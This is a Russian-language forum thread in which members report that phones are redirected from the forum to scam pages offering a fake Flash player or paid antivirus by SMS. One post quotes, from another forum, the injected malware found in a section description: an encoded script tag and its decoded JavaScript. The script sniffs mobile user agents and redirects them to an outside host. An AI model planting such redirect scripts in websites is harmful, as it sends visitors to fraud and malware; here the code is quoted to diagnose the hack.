[ Поиск ] - [ Пользователи ] - [ Календарь ] - [ Чат ]
Полная Версия: Не могу зайти на сайт с телефона
Страницы: 1, 2
IrSin
При попытке зайти на сайт с телефона происходит автоматическая переадресация на какой-то левый сайт, который предлагает "установить flash player", в итоге зайти сюда я могу только через компьютер ((
Почитала в инете, такая фигня у многих, только как решается я не поняла.

Вот что накопала (скопировала сюда сообщения с другого форума, где аналогичная проблема):
Скорее всего на главной странице форума iframe висит со скриптом соответствующим.
Отловил я зловреда.
Внедрили, похоже, sql-инъекцией.
Похоже, в описание раздела "Разговоры о клубной и спортивной жизни маленьких автомобилей" внедрили код - Код:
<script type="text/jаvаscript">document.write(unescape("%3C%73%63%...

При расшифровке получаем следующее: Код:

<script type="text/j_ava_script">var ismobile=navigator.userAgent.match(/(acs)|(alav)|(alca)|(amoi)|(audi)|(aste)|(avan)|(benq)|(bird)|(blac)|(blaz)|(brew)|(cell)|(cldc)|(cmd-)|(dang)|(doco)|(eric)|(hipt)|(inno)|(ipaq)|(java)|(jigs)|(kddi)|(keji)|(leno)|(lg-c)|(lg-d)|(lg-g)|(lge-)|(maui)|(maxo)|(midp)|(mits)|(mmef)|(mobi)|(mot-)|(moto)|(mwbp)|(nec-)|(newt)|(noki)|(opwv)|(palm)|(pana)|(pant)|(pdxg)|(phil)|(play)|(pluc)|(port)|(prox)|(qtek)|(qwap)|(sage)|(sams)|(sany)|(sch-)|(sec-)|(send)|(seri)|(sgh-)|(shar)|(sie-)|(siem)|(smal)|(smar)|(sony)|(sph-)|(symb)|(t-mo)|(teli)|(tim-)|(tosh)|(tsm-)|(upg1)|(upsi)|(vk-v)|(voda)|(w3cs)|(wap-)|(wapa)|(wapi)|(wapp)|(wapr)|(webc)|(winw)|(winw)|(xda)|(xda-)|(up.browser)|(up.link)|(windows.ce)|(iemobile)|(mini)|(mmp)|(symbian)|(midp)|(wap)|(phone)|(pocket)|(mobile)|(android)|(pda)|(PPC)|(Series60)|(Opera.Mini)|(ipad)|(iphone)/i);
if (ismobile)
{
document.location.href="http://waply.ru/land.php?s=1160&a=b&l=1";
};</script>

Я вообще не понимаю, о чем тут речь и что можно сделать. Может быть кто-нибудь поможет разобраться?

Кстати, начитала также, что помогает отключить java-скрипты - мне не помогло (хотя весь вечер вчера убила, чтобы найти, как их отключать) (((
маленькая Лера
IrSin
Спасибо за тему !! m0111.gif

Кто разбирается в этих кодах ? Помогите
Натуся
Ой, а мне предлагают установить не самый дешёвый антивирусник и предлагают выслать смс. Тоже с телефона и только на наш сайт.

То есть, я пытаюсь с телефона зайти сюда, а мне про угрозы и про антивирусник
IrSin
Девочки, это по любому разводка!
Ждем знающих людей, которые помогут.
Smudge
Есть большое подозрение, что Форум взломан.
Проверяю это.

_____________
"Тщеславие - мой любимый грех" (с) дьявол

"Сегодня я могу смеяться; но упаси меня, Боже, забыть о тех днях, когда я плакал" (с)
Киса
t2450.gif
Маска
Цитата
При попытке зайти на сайт с телефона происходит автоматическая переадресация на какой-то левый сайт, который предлагает "установить flash player", в итоге зайти сюда я могу только через компьютер

Да, у меня то же самое. И в эту тему уже с компьютера я зашла после долгих безуспешных попыток.

_____________
"Подойдите к краю скалы", - сказал он.
"Мы боимся", - сказали они,
"Подойдите к краю скалы", - сказал он.
"Мы боимся", - сказали они.
"Подойдите к краю скалы", - сказал он.
Они подошли.
Он подтолкнул их.
Они полетели.
Гийом Аполлинер.
Киса
У меня были странности сегодня - тема открылась, но без левой колонки, где наши ники и аватарки.

Надеюсь, что все обойдется.
Наташа
У меня изменений никаких не наблюдается (ттт).

_____________
<!--s-->Каждому человеку я нужна такой, какая я есть! Вот какая есть, такая и нужна!<!--/s-->

<!--s-->Всё хорошо, Бог рядом, ты не одна, ты можешь то, что можешь, - и этого вполне достаточно!!!<!--/s-->

<!--s-->Господи, помоги мне капитулировать перед этим и больше не бороться!!! Забери меня из этой кровопролитной войны за любовь!!! ПОЖАЛУЙСТА!!! <!--/s-->
маленькая Лера
У меня сегодня тоже были проблемы с компа - темы открывались белым листом , просто сплошной текст ответов без ников
Smudge
маленькая Лера, слетели скины - "оболочки" форумов. пришлось восстанавливать. Замучался с этим, однако...


_____________
"Тщеславие - мой любимый грех" (с) дьявол

"Сегодня я могу смеяться; но упаси меня, Боже, забыть о тех днях, когда я плакал" (с)
Киса
Smudge, эти оболочки как-то свзяны со взломом? Что там с этой напастью?

Спасибо тебе!
Алёна
Цитата
При попытке зайти на сайт с телефона происходит автоматическая переадресация на какой-то левый сайт, который предлагает "установить flash player", в итоге зайти сюда я могу только через компьютер ((

Такая же фигня... А раньше, когда заходила, то только как гость. При попытке авторизироваться, было велено ждать письма в ящик с новым паролем /старый не очень помню, но все возможнгые варианты не подходили/ письма не приходило так и. Как и новый flash player, который я таки установила не помогает войти на сайт.

_____________
Забей на все и радуйся!
маленькая Лера
Smudge
Спасибо !
Натуся
И меня что-то пока тоже не пускает с телефона. Но уже просто выкидывает на гуглскую строку поиска.
Здесь расположена полная версия этой страницы.